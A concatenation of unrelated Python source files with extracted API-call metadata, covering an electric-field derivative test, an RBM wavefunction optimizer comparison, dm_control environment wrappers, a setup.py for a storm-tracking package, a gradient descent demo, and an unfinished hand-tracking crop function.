norm = numpy.linalg.norm(output[(sl1, sl2)]-output_compare[(sl1,sl2)])
if norm > 1e-4:
print("%d %d %g" % (row, col, norm))
row = 0
if True:
#for row in range(10):
col = 0
sl1 = slice(nee*row,nee*(row+1))
sl2 = slice(dim*col,dim*(col+1))
print(output[(sl1, sl2)])
print(output_compare[(sl1,sl2)])
print(output[(sl1, sl2)] - output_compare[(sl1,sl2)])
def RunTest(device, region, number_test):
scalar_efield = GetScalarField(device, region, "scalar_efield", "ElectricField")
scalar_efield_derivatives = GetScalarFieldDerivatives(device, region, "scalar_efield_n", "ElectricField", "Potential")
node_indexes = GetNodeIndexes(device, region)
unit_vectors = GetUnitVectors(device, region)
number_elements = len(scalar_efield)//nee
if number_test < 1:
number_test = number_elements
output = numpy.zeros((nee*number_elements, dim*(nen+1)))
output_compare = numpy.zeros((nee*number_elements, dim*(nen+1)))
ecouple = None
if dim == 2:
ecouple = get_element_model_values(device=device, region=region, name="ElementEdgeCouple")
for ei in range(number_test):
#for ei in range(10):
edata = GetElementData(ei, node_indexes)
edata['matrices'] = GetNodeMatrices(edata, unit_vectors)
vector_efields = CalculateEField(edata, scalar_efield)
vector_efield_derivatives = CalculateEFieldDerivatives(edata, scalar_efield_derivatives)
if dim == 2:
CalculateFinalValues2D(edata, vector_efields, ecouple, output)
CalculateFinalDerivatives2D(edata, vector_efield_derivatives, ecouple, output)
elif dim == 3:
CalculateFinalValues3D(edata, vector_efields, output)
CalculateFinalDerivatives3D(edata, vector_efield_derivatives, output)
SetupOutputCompare(device, region, "ElectricField", "Potential", output_compare)
DoCompare(output, output_compare, number_test)
| [
"numpy.transpose",
"numpy.zeros",
"numpy.linalg.norm",
"numpy.linalg.solve",
"sys.exit"
] | [((6672, 6691), 'numpy.zeros', 'numpy.zeros', (['(nee,)'], {}), '((nee,))\n', (6683, 6691), False, 'import numpy\n'), ((6749, 6772), 'numpy.zeros', 'numpy.zeros', (['(nee, dim)'], {}), '((nee, dim))\n', (6760, 6772), False, 'import numpy\n'), ((7440, 7459), 'numpy.zeros', 'numpy.zeros', (['(nee,)'], {}), '((nee,))\n', (7451, 7459), False, 'import numpy\n'), ((7517, 7546), 'numpy.zeros', 'numpy.zeros', (['(nee, nen * dim)'], {}), '((nee, nen * dim))\n', (7528, 7546), False, 'import numpy\n'), ((11731, 11784), 'numpy.zeros', 'numpy.zeros', (['(nee * number_elements, dim * (nen + 1))'], {}), '((nee * number_elements, dim * (nen + 1)))\n', (11742, 11784), False, 'import numpy\n'), ((11798, 11851), 'numpy.zeros', 'numpy.zeros', (['(nee * number_elements, dim * (nen + 1))'], {}), '((nee * number_elements, dim * (nen + 1)))\n', (11809, 11851), False, 'import numpy\n'), ((1401, 1412), 'sys.exit', 'sys.exit', (['(0)'], {}), '(0)\n', (1409, 1412), False, 'import sys\n'), ((2925, 2948), 'numpy.zeros', 'numpy.zeros', (['(dim, dim)'], {}), '((dim, dim))\n', (2936, 2948), False, 'import numpy\n'), ((3428, 3449), 'numpy.zeros', 'numpy.zeros', (['(dim, 1)'], {}), '((dim, 1))\n', (3439, 3449), False, 'import numpy\n'), ((3570, 3604), 'numpy.linalg.solve', 'numpy.linalg.solve', (['matrices[i]', 'B'], {}), '(matrices[i], B)\n', (3588, 3604), False, 'import numpy\n'), ((4053, 4076), 'numpy.zeros', 'numpy.zeros', (['(dim, nen)'], {}), '((dim, nen))\n', (4064, 4076), False, 'import numpy\n'), ((4764, 4798), 'numpy.linalg.solve', 'numpy.linalg.solve', (['matrices[i]', 'B'], {}), '(matrices[i], B)\n', (4782, 4798), False, 'import numpy\n'), ((7206, 7230), 'numpy.transpose', 'numpy.transpose', (['outs[i]'], {}), '(outs[i])\n', (7221, 7230), False, 'import numpy\n'), ((10694, 10733), 'numpy.linalg.norm', 'numpy.linalg.norm', (['test2'], {'ord': 'numpy.inf'}), '(test2, ord=numpy.inf)\n', (10711, 10733), False, 'import numpy\n'), ((5235, 5275), 'numpy.transpose', 'numpy.transpose', (['vector_efields[i][:, 0]'], {}), '(vector_efields[i][:, 0])\n', (5250, 5275), False, 'import numpy\n'), ((10885, 10947), 'numpy.linalg.norm', 'numpy.linalg.norm', (['(output[sl1, sl2] - output_compare[sl1, sl2])'], {}), '(output[sl1, sl2] - output_compare[sl1, sl2])\n', (10902, 10947), False, 'import numpy\n'), ((6186, 6237), 'numpy.transpose', 'numpy.transpose', (['vector_efield_derivatives[i][:, k]'], {}), '(vector_efield_derivatives[i][:, k])\n', (6201, 6237), False, 'import numpy\n'), ((8606, 8643), 'numpy.transpose', 'numpy.transpose', (['outs[i, row_stride2]'], {}), '(outs[i, row_stride2])\n', (8621, 8643), False, 'import numpy\n')] |
import numpy as np
import matplotlib.pyplot as plt
import matplotlib2tikz
from qflow.wavefunctions import RBMWavefunction
from qflow.hamiltonians import HarmonicOscillator
from qflow.samplers import ImportanceSampler
from qflow.optimizers import SgdOptimizer, AdamOptimizer
from qflow.training import EnergyCallback, train
from qflow.mpi import master_rank
N, D = 1, 1
system = np.empty((N, D))
H = HarmonicOscillator(omega_ho=1)
psi = RBMWavefunction(N * D, 2)
# psi = SimpleGaussian(0.3)
org_params = psi.parameters[:]
sampler = ImportanceSampler(system, psi, 0.5)
labels = [
r"Sgd($\eta=1$)",
r"Sgd($\eta=0.1$)",
r"Sgd($\eta=0.05$)",
r"Adam($\eta=0.1,\beta_1=0.9$)",
r"Adam($\eta=0.1,\beta_1=0.8$)",
]
optimizers = [
SgdOptimizer(1),
SgdOptimizer(0.1),
SgdOptimizer(0.05),
AdamOptimizer(len(psi.parameters), 0.1, 0.9),
AdamOptimizer(len(psi.parameters), 0.1, 0.8),
]
E = []
for opt in optimizers:
# psi.parameters = org_params
psi = RBMWavefunction(N * D, 2)
# psi = SimpleGaussian(0.8)
sampler = ImportanceSampler(system, psi, 0.1)
sampler.thermalize(10000)
E_training = EnergyCallback(samples=1000000, verbose=True)
train(
psi,
H,
sampler,
iters=500,
samples=1000,
gamma=0.0,
optimizer=opt,
call_backs=[E_training],
call_back_resolution=50,
)
E.append(np.asarray(E_training))
if master_rank():
fig, ax = plt.subplots()
ax.set_xlabel(r"% of training")
ax.set_ylabel(r"Energy error [a.u.]")
for e, label in zip(E, labels):
ax.semilogy(np.abs(e / N - D / 2), label=label)
ax.legend()
matplotlib2tikz.save(
__file__ + ".tex",
extra_axis_parameters=["compat=newest", "legend pos=outer north east"],
)
plt.show()
| [
"matplotlib2tikz.save",
"matplotlib.pyplot.show",
"numpy.abs",
"qflow.training.train",
"qflow.mpi.master_rank",
"numpy.empty",
"qflow.hamiltonians.HarmonicOscillator",
"numpy.asarray",
"qflow.wavefunctions.RBMWavefunction",
"qflow.samplers.ImportanceSampler",
"matplotlib.pyplot.subplots",
"qfl... | [((380, 396), 'numpy.empty', 'np.empty', (['(N, D)'], {}), '((N, D))\n', (388, 396), True, 'import numpy as np\n'), ((401, 431), 'qflow.hamiltonians.HarmonicOscillator', 'HarmonicOscillator', ([], {'omega_ho': '(1)'}), '(omega_ho=1)\n', (419, 431), False, 'from qflow.hamiltonians import HarmonicOscillator\n'), ((438, 463), 'qflow.wavefunctions.RBMWavefunction', 'RBMWavefunction', (['(N * D)', '(2)'], {}), '(N * D, 2)\n', (453, 463), False, 'from qflow.wavefunctions import RBMWavefunction\n'), ((533, 568), 'qflow.samplers.ImportanceSampler', 'ImportanceSampler', (['system', 'psi', '(0.5)'], {}), '(system, psi, 0.5)\n', (550, 568), False, 'from qflow.samplers import ImportanceSampler\n'), ((1437, 1450), 'qflow.mpi.master_rank', 'master_rank', ([], {}), '()\n', (1448, 1450), False, 'from qflow.mpi import master_rank\n'), ((747, 762), 'qflow.optimizers.SgdOptimizer', 'SgdOptimizer', (['(1)'], {}), '(1)\n', (759, 762), False, 'from qflow.optimizers import SgdOptimizer, AdamOptimizer\n'), ((768, 785), 'qflow.optimizers.SgdOptimizer', 'SgdOptimizer', (['(0.1)'], {}), '(0.1)\n', (780, 785), False, 'from qflow.optimizers import SgdOptimizer, AdamOptimizer\n'), ((791, 809), 'qflow.optimizers.SgdOptimizer', 'SgdOptimizer', (['(0.05)'], {}), '(0.05)\n', (803, 809), False, 'from qflow.optimizers import SgdOptimizer, AdamOptimizer\n'), ((987, 1012), 'qflow.wavefunctions.RBMWavefunction', 'RBMWavefunction', (['(N * D)', '(2)'], {}), '(N * D, 2)\n', (1002, 1012), False, 'from qflow.wavefunctions import RBMWavefunction\n'), ((1059, 1094), 'qflow.samplers.ImportanceSampler', 'ImportanceSampler', (['system', 'psi', '(0.1)'], {}), '(system, psi, 0.1)\n', (1076, 1094), False, 'from qflow.samplers import ImportanceSampler\n'), ((1142, 1187), 'qflow.training.EnergyCallback', 'EnergyCallback', ([], {'samples': '(1000000)', 'verbose': '(True)'}), '(samples=1000000, verbose=True)\n', (1156, 1187), False, 'from qflow.training import EnergyCallback, train\n'), ((1192, 1319), 'qflow.training.train', 'train', (['psi', 'H', 'sampler'], {'iters': '(500)', 'samples': '(1000)', 'gamma': '(0.0)', 'optimizer': 'opt', 'call_backs': '[E_training]', 'call_back_resolution': '(50)'}), '(psi, H, sampler, iters=500, samples=1000, gamma=0.0, optimizer=opt,\n call_backs=[E_training], call_back_resolution=50)\n', (1197, 1319), False, 'from qflow.training import EnergyCallback, train\n'), ((1466, 1480), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (1478, 1480), True, 'import matplotlib.pyplot as plt\n'), ((1671, 1787), 'matplotlib2tikz.save', 'matplotlib2tikz.save', (["(__file__ + '.tex')"], {'extra_axis_parameters': "['compat=newest', 'legend pos=outer north east']"}), "(__file__ + '.tex', extra_axis_parameters=[\n 'compat=newest', 'legend pos=outer north east'])\n", (1691, 1787), False, 'import matplotlib2tikz\n'), ((1810, 1820), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1818, 1820), True, 'import matplotlib.pyplot as plt\n'), ((1408, 1430), 'numpy.asarray', 'np.asarray', (['E_training'], {}), '(E_training)\n', (1418, 1430), True, 'import numpy as np\n'), ((1615, 1636), 'numpy.abs', 'np.abs', (['(e / N - D / 2)'], {}), '(e / N - D / 2)\n', (1621, 1636), True, 'import numpy as np\n')] |
from collections import OrderedDict, deque
from typing import Any, NamedTuple
import dm_env
import numpy as np
from dm_control import manipulation, suite
from dm_control.suite.wrappers import action_scale, pixels
from dm_env import StepType, specs
import custom_dmc_tasks as cdmc
class ExtendedTimeStep(NamedTuple):
step_type: Any
reward: Any
discount: Any
observation: Any
action: Any
physics: Any
def first(self):
return self.step_type == StepType.FIRST
def mid(self):
return self.step_type == StepType.MID
def last(self):
return self.step_type == StepType.LAST
def __getitem__(self, attr):
return getattr(self, attr)
class FlattenJacoObservationWrapper(dm_env.Environment):
def __init__(self, env):
self._env = env
self._obs_spec = OrderedDict()
wrapped_obs_spec = env.observation_spec().copy()
if 'front_close' in wrapped_obs_spec:
spec = wrapped_obs_spec['front_close']
# drop batch dim
self._obs_spec['pixels'] = specs.BoundedArray(shape=spec.shape[1:],
dtype=spec.dtype,
minimum=spec.minimum,
maximum=spec.maximum,
name='pixels')
wrapped_obs_spec.pop('front_close')
for key, spec in wrapped_obs_spec.items():
assert spec.dtype == np.float64
assert type(spec) == specs.Array
dim = np.sum(
np.fromiter((np.int(np.prod(spec.shape))
for spec in wrapped_obs_spec.values()), np.int32))
self._obs_spec['observations'] = specs.Array(shape=(dim,),
dtype=np.float32,
name='observations')
def _transform_observation(self, time_step):
obs = OrderedDict()
if 'front_close' in time_step.observation:
pixels = time_step.observation['front_close']
time_step.observation.pop('front_close')
pixels = np.squeeze(pixels)
obs['pixels'] = pixels
features = []
for feature in time_step.observation.values():
features.append(feature.ravel())
obs['observations'] = np.concatenate(features, axis=0)
return time_step._replace(observation=obs)
def reset(self):
time_step = self._env.reset()
return self._transform_observation(time_step)
def step(self, action):
time_step = self._env.step(action)
return self._transform_observation(time_step)
def observation_spec(self):
return self._obs_spec
def action_spec(self):
return self._env.action_spec()
def __getattr__(self, name):
return getattr(self._env, name)
class ActionRepeatWrapper(dm_env.Environment):
def __init__(self, env, num_repeats):
self._env = env
self._num_repeats = num_repeats
def step(self, action):
reward = 0.0
discount = 1.0
for i in range(self._num_repeats):
time_step = self._env.step(action)
reward += time_step.reward * discount
discount *= time_step.discount
if time_step.last():
break
return time_step._replace(reward=reward, discount=discount)
def observation_spec(self):
return self._env.observation_spec()
def action_spec(self):
return self._env.action_spec()
def reset(self):
return self._env.reset()
def __getattr__(self, name):
return getattr(self._env, name)
class FrameStackWrapper(dm_env.Environment):
def __init__(self, env, num_frames, pixels_key='pixels'):
self._env = env
self._num_frames = num_frames
self._frames = deque([], maxlen=num_frames)
self._pixels_key = pixels_key
wrapped_obs_spec = env.observation_spec()
assert pixels_key in wrapped_obs_spec
pixels_shape = wrapped_obs_spec[pixels_key].shape
# remove batch dim
if len(pixels_shape) == 4:
pixels_shape = pixels_shape[1:]
self._obs_spec = specs.BoundedArray(shape=np.concatenate(
[[pixels_shape[2] * num_frames], pixels_shape[:2]], axis=0),
dtype=np.uint8,
minimum=0,
maximum=255,
name='observation')
def _transform_observation(self, time_step):
assert len(self._frames) == self._num_frames
obs = np.concatenate(list(self._frames), axis=0)
return time_step._replace(observation=obs)
def _extract_pixels(self, time_step):
pixels = time_step.observation[self._pixels_key]
# remove batch dim
if len(pixels.shape) == 4:
pixels = pixels[0]
return pixels.transpose(2, 0, 1).copy()
def reset(self):
time_step = self._env.reset()
pixels = self._extract_pixels(time_step)
for _ in range(self._num_frames):
self._frames.append(pixels)
return self._transform_observation(time_step)
def step(self, action):
time_step = self._env.step(action)
pixels = self._extract_pixels(time_step)
self._frames.append(pixels)
return self._transform_observation(time_step)
def observation_spec(self):
return self._obs_spec
def action_spec(self):
return self._env.action_spec()
def __getattr__(self, name):
return getattr(self._env, name)
class ActionDTypeWrapper(dm_env.Environment):
def __init__(self, env, dtype):
self._env = env
wrapped_action_spec = env.action_spec()
self._action_spec = specs.BoundedArray(wrapped_action_spec.shape,
dtype,
wrapped_action_spec.minimum,
wrapped_action_spec.maximum,
'action')
def step(self, action):
action = action.astype(self._env.action_spec().dtype)
return self._env.step(action)
def observation_spec(self):
return self._env.observation_spec()
def action_spec(self):
return self._action_spec
def reset(self):
return self._env.reset()
def __getattr__(self, name):
return getattr(self._env, name)
class ObservationDTypeWrapper(dm_env.Environment):
def __init__(self, env, dtype):
self._env = env
self._dtype = dtype
wrapped_obs_spec = env.observation_spec()['observations']
self._obs_spec = specs.Array(wrapped_obs_spec.shape, dtype,
'observation')
def _transform_observation(self, time_step):
obs = time_step.observation['observations'].astype(self._dtype)
return time_step._replace(observation=obs)
def reset(self):
time_step = self._env.reset()
return self._transform_observation(time_step)
def step(self, action):
time_step = self._env.step(action)
return self._transform_observation(time_step)
def observation_spec(self):
return self._obs_spec
def action_spec(self):
return self._env.action_spec()
def __getattr__(self, name):
return getattr(self._env, name)
class ExtendedTimeStepWrapper(dm_env.Environment):
def __init__(self, env):
self._env = env
physics = env.physics.state()
self._physics_spec = specs.Array(physics.shape,
dtype=physics.dtype,
name='physics')
def reset(self):
time_step = self._env.reset()
return self._augment_time_step(time_step)
def step(self, action):
time_step = self._env.step(action)
return self._augment_time_step(time_step, action)
def _augment_time_step(self, time_step, action=None):
if action is None:
action_spec = self.action_spec()
action = np.zeros(action_spec.shape, dtype=action_spec.dtype)
def default_on_none(value, default):
if value is None:
return default
return value
return ExtendedTimeStep(observation=time_step.observation,
step_type=time_step.step_type,
action=action,
reward=default_on_none(time_step.reward, 0.0),
discount=default_on_none(
time_step.discount, 1.0),
physics=self._env.physics.state())
def observation_spec(self):
return self._env.observation_spec()
def action_spec(self):
return self._env.action_spec()
def reward_spec(self):
spec = self._env.reward_spec()
if hasattr(self._task, 'get_reward_spec'):
task_spec = self._task.get_reward_spec()
if task_spec is not None:
spec = task_spec
if len(spec.shape) == 0:
spec = spec.replace(shape=tuple((1,)), dtype=np.float32)
return spec
def physics_spec(self):
return self._physics_spec
def discount_spec(self):
spec = self._env.discount_spec()
if hasattr(self._task, 'get_discount_spec'):
task_spec = self._task.get_discount_spec()
if task_spec is not None:
spec = task_spec
if len(spec.shape) == 0:
spec = spec.replace(shape=tuple((1,)), dtype=np.float32)
return spec
def __getattr__(self, name):
return getattr(self._env, name)
def _make_jaco(obs_type, domain, task, frame_stack, action_repeat, seed):
env = cdmc.make_jaco(task, obs_type, seed)
env = ActionDTypeWrapper(env, np.float32)
env = ActionRepeatWrapper(env, action_repeat)
env = FlattenJacoObservationWrapper(env)
return env
def _make_dmc(obs_type, domain, task, frame_stack, action_repeat, seed):
visualize_reward = False
if (domain, task) in suite.ALL_TASKS:
env = suite.load(domain,
task,
task_kwargs=dict(random=seed),
environment_kwargs=dict(flat_observation=True),
visualize_reward=visualize_reward)
else:
env = cdmc.make(domain,
task,
task_kwargs=dict(random=seed),
environment_kwargs=dict(flat_observation=True),
visualize_reward=visualize_reward)
env = ActionDTypeWrapper(env, np.float32)
env = ActionRepeatWrapper(env, action_repeat)
if obs_type == 'pixels':
# zoom in camera for quadruped
camera_id = dict(quadruped=2).get(domain, 0)
render_kwargs = dict(height=84, width=84, camera_id=camera_id)
env = pixels.Wrapper(env,
pixels_only=True,
render_kwargs=render_kwargs)
return env
def make(name, obs_type='states', frame_stack=1, action_repeat=1, seed=1):
assert obs_type in ['states', 'pixels']
if name.startswith('point_mass_maze'):
domain = 'point_mass_maze'
_, _, _, task = name.split('_', 3)
else:
domain, task = name.split('_', 1)
domain = dict(cup='ball_in_cup').get(domain, domain)
make_fn = _make_jaco if domain == 'jaco' else _make_dmc
env = make_fn(obs_type, domain, task, frame_stack, action_repeat, seed)
if obs_type == 'pixels':
env = FrameStackWrapper(env, frame_stack)
else:
env = ObservationDTypeWrapper(env, np.float32)
env = action_scale.Wrapper(env, minimum=-1.0, maximum=+1.0)
env = ExtendedTimeStepWrapper(env)
return env
| [
"dm_env.specs.Array",
"dm_control.suite.wrappers.pixels.Wrapper",
"collections.deque",
"numpy.zeros",
"dm_env.specs.BoundedArray",
"numpy.prod",
"custom_dmc_tasks.make_jaco",
"collections.OrderedDict",
"numpy.squeeze",
"dm_control.suite.wrappers.action_scale.Wrapper",
"numpy.concatenate",
"dm_... | [((10067, 10103), 'custom_dmc_tasks.make_jaco', 'cdmc.make_jaco', (['task', 'obs_type', 'seed'], {}), '(task, obs_type, seed)\n', (10081, 10103), True, 'import custom_dmc_tasks as cdmc\n'), ((12004, 12057), 'dm_control.suite.wrappers.action_scale.Wrapper', 'action_scale.Wrapper', (['env'], {'minimum': '(-1.0)', 'maximum': '(+1.0)'}), '(env, minimum=-1.0, maximum=+1.0)\n', (12024, 12057), False, 'from dm_control.suite.wrappers import action_scale, pixels\n'), ((837, 850), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (848, 850), False, 'from collections import OrderedDict, deque\n'), ((1805, 1869), 'dm_env.specs.Array', 'specs.Array', ([], {'shape': '(dim,)', 'dtype': 'np.float32', 'name': '"""observations"""'}), "(shape=(dim,), dtype=np.float32, name='observations')\n", (1816, 1869), False, 'from dm_env import StepType, specs\n'), ((2040, 2053), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (2051, 2053), False, 'from collections import OrderedDict, deque\n'), ((2445, 2477), 'numpy.concatenate', 'np.concatenate', (['features'], {'axis': '(0)'}), '(features, axis=0)\n', (2459, 2477), True, 'import numpy as np\n'), ((3975, 4003), 'collections.deque', 'deque', (['[]'], {'maxlen': 'num_frames'}), '([], maxlen=num_frames)\n', (3980, 4003), False, 'from collections import OrderedDict, deque\n'), ((5975, 6100), 'dm_env.specs.BoundedArray', 'specs.BoundedArray', (['wrapped_action_spec.shape', 'dtype', 'wrapped_action_spec.minimum', 'wrapped_action_spec.maximum', '"""action"""'], {}), "(wrapped_action_spec.shape, dtype, wrapped_action_spec.\n minimum, wrapped_action_spec.maximum, 'action')\n", (5993, 6100), False, 'from dm_env import StepType, specs\n'), ((6912, 6969), 'dm_env.specs.Array', 'specs.Array', (['wrapped_obs_spec.shape', 'dtype', '"""observation"""'], {}), "(wrapped_obs_spec.shape, dtype, 'observation')\n", (6923, 6969), False, 'from dm_env import StepType, specs\n'), ((7797, 7860), 'dm_env.specs.Array', 'specs.Array', (['physics.shape'], {'dtype': 'physics.dtype', 'name': '"""physics"""'}), "(physics.shape, dtype=physics.dtype, name='physics')\n", (7808, 7860), False, 'from dm_env import StepType, specs\n'), ((11220, 11286), 'dm_control.suite.wrappers.pixels.Wrapper', 'pixels.Wrapper', (['env'], {'pixels_only': '(True)', 'render_kwargs': 'render_kwargs'}), '(env, pixels_only=True, render_kwargs=render_kwargs)\n', (11234, 11286), False, 'from dm_control.suite.wrappers import action_scale, pixels\n'), ((1073, 1195), 'dm_env.specs.BoundedArray', 'specs.BoundedArray', ([], {'shape': 'spec.shape[1:]', 'dtype': 'spec.dtype', 'minimum': 'spec.minimum', 'maximum': 'spec.maximum', 'name': '"""pixels"""'}), "(shape=spec.shape[1:], dtype=spec.dtype, minimum=spec.\n minimum, maximum=spec.maximum, name='pixels')\n", (1091, 1195), False, 'from dm_env import StepType, specs\n'), ((2238, 2256), 'numpy.squeeze', 'np.squeeze', (['pixels'], {}), '(pixels)\n', (2248, 2256), True, 'import numpy as np\n'), ((8335, 8387), 'numpy.zeros', 'np.zeros', (['action_spec.shape'], {'dtype': 'action_spec.dtype'}), '(action_spec.shape, dtype=action_spec.dtype)\n', (8343, 8387), True, 'import numpy as np\n'), ((4354, 4428), 'numpy.concatenate', 'np.concatenate', (['[[pixels_shape[2] * num_frames], pixels_shape[:2]]'], {'axis': '(0)'}), '([[pixels_shape[2] * num_frames], pixels_shape[:2]], axis=0)\n', (4368, 4428), True, 'import numpy as np\n'), ((5098, 5123), 'dm_control.suite.wrappers.pixels.transpose', 'pixels.transpose', (['(2)', '(0)', '(1)'], {}), '(2, 0, 1)\n', (5114, 5123), False, 'from dm_control.suite.wrappers import action_scale, pixels\n'), ((1666, 1685), 'numpy.prod', 'np.prod', (['spec.shape'], {}), '(spec.shape)\n', (1673, 1685), True, 'import numpy as np\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The setup script.
"""
# Third-party
import numpy
from numpy import f2py
from setuptools.extension import Extension
from setuptools import find_packages
from setuptools import setup
from setuptools.command.build_ext import build_ext
# Import Cython AFTER setuptools
from Cython.Build import cythonize # isort: skip
from Cython import Compiler # isort:skip
def read_file(path):
with open(path, "r") as f:
return "\n".join([l.strip() for l in f.readlines()])
description_files = ["README.md", "HISTORY.md"]
metadata = {
"name": "stormtrack",
"version": "0.4.6",
"description": "Track two-dimensional features over time in high-resolution weather/climate data.",
"long_description": "\n\n".join([read_file(f) for f in description_files]),
"author": "<NAME>",
"author_email": "<EMAIL>",
"url": "https://github.com/ruestefa/stormtrack",
"keywords": "stormtrack",
"classifiers": [
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Cython",
],
}
# python = "==3.7.*"
python = ">=3.7"
dependencies = [
"basemap @ git+https://github.com/matplotlib/basemap.git",
"cython",
"click >= 6.0",
"descartes",
"h5py",
"python-igraph",
"netcdf4",
"numpy",
"matplotlib",
"scipy",
"shapely",
"pillow",
"pytz",
"pyproj",
]
scripts = [
# Main
"identify-features=stormtrack.identify_features:cli",
"identify-front-fields=stormtrack.identify_front_fields:cli",
"track-features=stormtrack.track_features:cli",
# Additional
"group-tracks=stormtrack.scripts.group_tracks:cli",
"inspect-tracks=stormtrack.scripts.inspect_tracks:cli",
"project-tracks=stormtrack.scripts.project_tracks:cli",
]
# Compile FORTRAN files
with open("src/stormtrack/extra/fronts/_libfronts.f77", "rb") as f:
code = f.read()
stat = f2py.compile(code, modulename="src/stormtrack.extra.fronts._libfronts")
if stat != 0:
raise Exception("f2py failed", stat)
# https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#compiler-options
Compiler.Options.annotate = True
# https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#compiler-directives
compiler_directives={"embedsignature": True}
extensions = [
# Extension("*", ["src/**/*.pyx"], extra_compile_args=["-O0"]),
Extension("*", ["src/**/*.pyx"], extra_compile_args=["-O3"]),
]
cython_setup = {
"ext_modules": cythonize(extensions, compiler_directives={"language_level": 3}),
"cmdclass": {"build_ext": build_ext},
"include_dirs": [numpy.get_include()],
"compiler_directives": compiler_directives,
}
setup(
python_requires=python,
install_requires=dependencies,
entry_points={"console_scripts": scripts},
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
**cython_setup,
**metadata,
)
| [
"Cython.Build.cythonize",
"numpy.f2py.compile",
"setuptools.extension.Extension",
"numpy.get_include",
"setuptools.find_packages"
] | [((2089, 2160), 'numpy.f2py.compile', 'f2py.compile', (['code'], {'modulename': '"""src/stormtrack.extra.fronts._libfronts"""'}), "(code, modulename='src/stormtrack.extra.fronts._libfronts')\n", (2101, 2160), False, 'from numpy import f2py\n'), ((2601, 2661), 'setuptools.extension.Extension', 'Extension', (['"""*"""', "['src/**/*.pyx']"], {'extra_compile_args': "['-O3']"}), "('*', ['src/**/*.pyx'], extra_compile_args=['-O3'])\n", (2610, 2661), False, 'from setuptools.extension import Extension\n'), ((2702, 2766), 'Cython.Build.cythonize', 'cythonize', (['extensions'], {'compiler_directives': "{'language_level': 3}"}), "(extensions, compiler_directives={'language_level': 3})\n", (2711, 2766), False, 'from Cython.Build import cythonize\n'), ((2831, 2850), 'numpy.get_include', 'numpy.get_include', ([], {}), '()\n', (2848, 2850), False, 'import numpy\n'), ((3034, 3054), 'setuptools.find_packages', 'find_packages', (['"""src"""'], {}), "('src')\n", (3047, 3054), False, 'from setuptools import find_packages\n')] |
import numpy as np
import matplotlib.pyplot as plt
import gd
if __name__ == "__main__":
def f(xx):
x = xx[0]
y = xx[1]
return 5 * x ** 2 - 6 * x * y + 3 * y ** 2 + 6 * x - 6 * y
def df(xx):
x = xx[0]
y = xx[1]
return np.array([10 * x - 6 * y + 6, -6 * x + 6 * y - 6])
algo = gd.GradiantDecent(f, df)
initial = np.array([1, 1])
algo.solve(initial)
print(algo.x_)
print(algo.opt_)
plt.scatter(initial[0], initial[1], color="k", marker="o")
plt.plot(algo.path_[:, 0], algo.path_[:, 1], color="k", linewidth=1.5)
xs = np.linspace(-2, 2, 300)
ys = np.linspace(-2, 2, 300)
xmesh, ymesh = np.meshgrid(xs, ys)
xx = np.r_[xmesh.reshape(1, -1), ymesh.reshape(1, -1)]
levels = [-3, -2.9, -2.8, -2.6, -2.4, -2.2, -2, -1, 0, 1, 2, 3, 4]
plt.contour(xs, ys, f(xx).reshape(xmesh.shape), levels=levels, colors="k", linestyles="dotted")
plt.show()
| [
"numpy.meshgrid",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"gd.GradiantDecent",
"numpy.array",
"numpy.linspace"
] | [((339, 363), 'gd.GradiantDecent', 'gd.GradiantDecent', (['f', 'df'], {}), '(f, df)\n', (356, 363), False, 'import gd\n'), ((378, 394), 'numpy.array', 'np.array', (['[1, 1]'], {}), '([1, 1])\n', (386, 394), True, 'import numpy as np\n'), ((468, 526), 'matplotlib.pyplot.scatter', 'plt.scatter', (['initial[0]', 'initial[1]'], {'color': '"""k"""', 'marker': '"""o"""'}), "(initial[0], initial[1], color='k', marker='o')\n", (479, 526), True, 'import matplotlib.pyplot as plt\n'), ((531, 601), 'matplotlib.pyplot.plot', 'plt.plot', (['algo.path_[:, 0]', 'algo.path_[:, 1]'], {'color': '"""k"""', 'linewidth': '(1.5)'}), "(algo.path_[:, 0], algo.path_[:, 1], color='k', linewidth=1.5)\n", (539, 601), True, 'import matplotlib.pyplot as plt\n'), ((611, 634), 'numpy.linspace', 'np.linspace', (['(-2)', '(2)', '(300)'], {}), '(-2, 2, 300)\n', (622, 634), True, 'import numpy as np\n'), ((644, 667), 'numpy.linspace', 'np.linspace', (['(-2)', '(2)', '(300)'], {}), '(-2, 2, 300)\n', (655, 667), True, 'import numpy as np\n'), ((687, 706), 'numpy.meshgrid', 'np.meshgrid', (['xs', 'ys'], {}), '(xs, ys)\n', (698, 706), True, 'import numpy as np\n'), ((941, 951), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (949, 951), True, 'import matplotlib.pyplot as plt\n'), ((276, 326), 'numpy.array', 'np.array', (['[10 * x - 6 * y + 6, -6 * x + 6 * y - 6]'], {}), '([10 * x - 6 * y + 6, -6 * x + 6 * y - 6])\n', (284, 326), True, 'import numpy as np\n')] |
import cv2
import numpy as np
def track_hand(results,frame, net) :
"""
:param results:
:param frame:
:param net:
:return:
"""
handLms = results.multi_hand_landmarks[0]
xList=[]
yList=[]
for id, lm in enumerate(handLms.landmark) :
h,w,c = frame.shape
cx,cy = int(lm.x*w), int(lm.y*h)
xList.append(cx)
yList.append(cy)
xmin, xmax = min(xList), max(xList)
ymin, ymax = min(yList), max(yList)
xmin -= 10
xmax += 10
ymin -= 10
ymax += 10
bxmin = xmin
bymin = ymin
if ((xmax-xmin)>(ymax-ymin)) :
bxmax = xmax
bymax = ymin + (xmax-xmin)
else :
bymax = ymax
bxmax = xmin + (ymax - ymin)
boundbox = bxmin,bymin,bxmax,bymax
crop_img = frame[boundbox[1]:boundbox[3], boundbox[0]:boundbox[2]].copy()
final_frame = cv2.resize(crop_img, (256,256), interpolation=cv2.INTER_CUBIC)
final_frame = np.reshape(final_frame, (1,256,256,3))
result = net.model.predict_on_batch(final_frame)
heatmap = result[2]
joint_list = []
pos_list = []
